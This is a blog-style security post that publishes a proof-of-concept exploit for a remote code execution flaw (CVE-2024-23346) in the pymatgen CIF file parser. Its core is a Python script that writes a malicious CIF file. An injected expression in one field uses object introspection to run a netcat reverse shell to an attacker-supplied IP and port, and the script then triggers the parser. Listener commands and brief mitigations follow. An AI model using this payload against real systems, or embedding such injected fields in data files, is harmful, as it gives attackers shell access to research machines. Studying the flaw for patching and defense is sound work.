Pymatgen 2024.1 CIF Parser Remote Code Execution (CVE-2024-23346) – Exploit PoC
This post contains technical details about security vulnerabilities and exploit development for educational and research purposes only. All techniques described are intended for use in authorized penetration testing, CTF competitions, or controlled lab environments.
Unauthorized use of these techniques against systems you do not own or have explicit written permission to test is illegal and unethical. Always obtain proper authorization before testing.
Disclosure status: Patch Available
CVE references link to public NVD / vendor advisories. Proof-of-concept code, where included, is provided after patch availability for defensive research purposes.
Content *
Overview
A critical remote code execution vulnerability tracked as CVE-2024-23346 affects the pymatgen, a widely used library in computational materials science.
The vulnerability occurs in the CIF file parsing functionality. When a specially crafted CIF file is processed by the parser, malicious Python expressions embedded inside certain fields can be evaluated, leading to arbitrary command execution on the host system.
This issue can allow attackers to gain system-level access if an application automatically processes untrusted CIF files.
Affected Software
Vendor: Pymatgen Project
Software: pymatgen
Affected version:
- pymatgen 2024.1
Tested environment:
- Kali Linux 2024.1
Technical Details
The vulnerability arises from unsafe evaluation of expressions embedded within CIF file fields during parsing.
By crafting a malicious CIF file containing specially designed Python expressions, an attacker can abuse Python’s object introspection mechanisms to access internal classes and execute arbitrary commands through the operating system.
This exploit demonstrates the ability to spawn a reverse shell when the malicious CIF file is parsed.
Proof of Concept (PoC)
The following script generates a malicious CIF file and triggers the vulnerable parser.
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346
import os
# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
# Constructing the malicious CIF file with reverse shell payload
malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""
# Save to a file
with open("vuln.cif", "w") as file:
file.write(malicious_cif)
print("[*] Malicious CIF file created: vuln.cif")
# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
ip = input("Enter your IP address for the reverse shell: ")
port = input("Enter the port for the reverse shell to listen on: ")
# Create the malicious CIF file
create_malicious_cif(ip, port)
# Trigger the Pymatgen CIF parser to parse the malicious file
from pymatgen.io.cif import CifParser
parser = CifParser("vuln.cif")
structure = parser.parse_structures()
# Running the exploit
if __name__ == "__main__":
exploit()
How the Exploit Works
The exploit performs the following steps:
- Generates a malicious CIF file containing a payload.
- The payload uses Python object introspection to access system-level functionality.
- When the CIF file is parsed by the pymatgen parser, the payload executes.
- A reverse shell connection is established to the attacker-controlled system.
Usage
Run the exploit script:
python3 exploit.py
The script will prompt for:
- Attacker IP address
- Listening port
Once executed, the malicious CIF file is generated and parsed, triggering the payload.
Before running the exploit, start a listener on your system:
nc -lvnp <port>
Impact
Successful exploitation may allow attackers to:
- Execute arbitrary system commands
- Gain remote shell access
- Compromise scientific computing environments
- Escalate attacks in research infrastructures
Mitigation
Recommended security measures include:
- Updating pymatgen to a patched version
- Avoid parsing untrusted CIF files
- Running scientific parsing tools inside sandboxed environments
- Applying strict file validation
Researcher
Security research conducted by:
Mohammed Idrees Banyamer
Cybersecurity Researcher – Jordan 🇯🇴
Instagram: @banyamer_security
GitHub: https://github.com/mbanyamer
Disclaimer
This proof-of-concept is provided for educational purposes and authorized security testing only. Unauthorized use against systems without explicit permission is illegal.
Disclosure: Patch Available
Comments
No comments yet. Be the first.
Leave a Comment